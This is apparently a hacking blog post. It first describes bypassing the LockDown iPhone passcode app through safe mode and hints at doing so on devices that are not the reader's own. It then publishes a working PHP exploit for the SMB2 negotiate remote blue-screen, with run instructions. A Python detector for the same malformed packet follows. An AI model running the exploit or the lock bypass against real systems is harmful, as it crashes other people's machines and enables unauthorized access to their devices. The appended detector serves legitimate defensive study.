Bypassing LockDown (iPhone Application)

————

One funny thing about programs like LockDown is that they all use MobileSubstrate to attach, and for a program like LockDown, which is supposed to add security to the iPhone, that's not too good!

As you may know, files attached through MobileSubstrate, and some other services, do not work in safe mode. They are all disabled!

So for the LockDown password (in my test case it was version 6.2, almost the latest by now) you can just use SBSettings to boot into safe mode and access everything that has been locked!

If you don't have SBSettings installed and Cydia is locked, I guess it is not your own iPhone, so I'll just say there is a command you could use over an SSH connection to reset SpringBoard to safe mode. It's maybe “Touch something” or something else! ;) Try and learn.

Blue Screen of Shame

Once more Microsoft has done something great.

The SMB2 exploit, which some may know as the Blue Screen Vista exploit, has not yet been patched and will not be soon.

No Emergency Patch For Latest Windows Exploit

The solution for the SMB2 issue, as published by Microsoft, is to turn off your file sharing or turn on your firewall.

So you may use this exploit, of course for educational purposes only, and maybe to inform Microsoft of how annoying this exploit could be.

So I've managed to find/make some PHP code to do so, and I'm using it on my Mac with the php command. This code could run on an iPhone with some modifications.

You may save this file (e.g. bsod.php) and run it like this:

php  ./bsod.php [IP]

The file is as follows:


<?
/*
* Lame Windows Vista / Windows 7 / Win2k8 R1 SP2+updates and beta R2 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD
* Author: Ricardo Almeida
* email:  ricardojba[at]aeiou[DoT]pt
*
* Credits: http://seclists.org/fulldisclosure/2009/Sep/0039.html (exploit ported to PHP)
*
*/
if ($argc != 2) {die("Usage: lame-smb-bsod.php \n");}
$host = $argv[1];
$payload = "\x00\x00\x00\x90".
"\xff\x53\x4d\x42".
"\x72\x00\x00\x00".
"\x00\x18\x53\xc8".
"\x00\x26".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".
"\x30\x30\x32\x00";
$mysock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$result = socket_connect($mysock, $host, 445);
if ($result === false) echo "Connect failed.\nReason: ($result) " . socket_strerror(socket_last_error($mysock)) . "\n";
else echo "\nConnected to $host\n";
echo "Bye, Bye Windowz…\n";
socket_write($mysock, $payload, strlen($payload));
socket_close($mysock);
?>
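
For the defending side, here is an added example (not part of the original post or of the ported exploit) that parses a captured TCP/445 payload and flags an SMB1 negotiate request which, like the payload above, carries a non-zero value in header bytes 12-13 (the PIDHigh field, normally zero in a negotiate request) while offering an SMB 2.x dialect. The function names are hypothetical, the rule is a heuristic assumed for illustration, and the sample packets are constructed with a made-up PIDHigh value.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72

def parse_negotiate(tcp_payload: bytes):
    """Return (pid_high, dialects) for an SMB1 NEGOTIATE request, else None."""
    smb = tcp_payload[4:]  # skip the 4-byte NetBIOS session header
    if len(smb) < 35 or smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE:
        return None
    (pid_high,) = struct.unpack_from("<H", smb, 12)  # SMB header bytes 12-13
    off = 33 + 2 * smb[32]  # skip WordCount byte and any parameter words
    if len(smb) < off + 2:
        return None
    (byte_count,) = struct.unpack_from("<H", smb, off)
    data = smb[off + 2 : off + 2 + byte_count]
    # Each dialect entry is 0x02 followed by a NUL-terminated ASCII name.
    dialects = [c[1:].decode("ascii", "replace")
                for c in data.split(b"\x00") if c[:1] == b"\x02"]
    return pid_high, dialects

def is_suspicious(tcp_payload: bytes) -> bool:
    """Heuristic (assumption): non-zero PIDHigh plus an SMB 2.x dialect offer."""
    parsed = parse_negotiate(tcp_payload)
    if parsed is None:
        return False
    pid_high, dialects = parsed
    return pid_high != 0 and any(d.startswith("SMB 2") for d in dialects)

def sample_negotiate(pid_high: int, dialects) -> bytes:
    """Constructed test input: a minimal SMB1 NEGOTIATE request."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    header = struct.pack("<4sBIBHH8sHHHHH", SMB1_MAGIC, SMB_COM_NEGOTIATE,
                         0, 0x18, 0xC853, pid_high, b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    smb = header + b"\x00" + struct.pack("<H", len(data)) + data
    return struct.pack(">I", len(smb)) + smb

if __name__ == "__main__":
    offered = ["NT LM 0.12", "SMB 2.002"]
    for label, pid_high in (("ordinary", 0), ("anomalous", 0x0001)):
        print(label, is_suspicious(sample_negotiate(pid_high, offered)))
```

A hit from a host that has no business talking to your file servers is worth correlating with the workaround above: file sharing off, or TCP/445 blocked at the firewall.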

Full detailed article about the Windows SMB2 exploit: SMB2 Exploitation Guide for Housekeepers & Dummies!

If you want this exploit in other programming languages: http://lmgtfy.com/?q=smb2+exploit+code